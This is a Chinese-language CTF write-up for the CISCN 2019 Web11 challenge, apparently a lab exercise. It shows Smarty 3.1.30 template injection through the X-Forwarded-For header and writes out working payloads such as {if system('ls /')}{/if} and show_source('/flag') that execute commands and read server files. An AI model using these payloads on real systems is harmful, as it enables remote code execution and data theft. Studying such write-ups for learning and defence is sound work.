[CISCN 2019华东南]Web11 wp
信息搜集
页面内容如下:
右上角显示的是我的当前 IP 。
在最下角提示:Build With Smarty !
Smarty 是 PHP 的一个模板引擎,那么这道题应该是 Smarty 模板注入。
Smarty 模板注入
可以参考博客:Smarty模板注入&CVE-2017-1000480
左上角既然能提取我的 IP ,那么根据页面内容稍微猜一下,应该是从 XFF 头提取 IP ,假设没有设置 XFF 头,提取的就是真实 IP 。
发个包测试一下:
说明这里确实会读取 XFF 头。
既然已经知道是 Smarty 模板引擎,那么就直接测试:
a{*comment*}b
返回结果是 ab ,测试成功。
查看 Smarty 版本:
{$smarty.version}
当前版本号为 3.1.30 。
if 语句执行 PHP 代码:
这个版本许多方法不可行,因此直接用 if 语句执行 PHP 代码:
{if phpinfo()}{/if}
值得注意的是 if 里面不用带分号。
这样的话就直接查看根目录下的文件:
{if system('ls /')}{/if}
在根目录下找到了 flag 文件。
查看 flag :
{if system('cat /flag')}{/if}
不回显,flag 看不了。
可能是过滤了 flag ,但是尝试了 {if system('cat /fl\ag')}{/if} 也不行
也可能是其他的原因,尝试了以下方法:
{if readfile ('/flag')}{/if}
{if show_source('/flag')}{/if}
{if system('cat /flag')}{/if}
{if file_get_contents('/flag')}{/if}
最后是:{if show_source('/flag')}{/if} 成功回显了:
拿到 flag 。
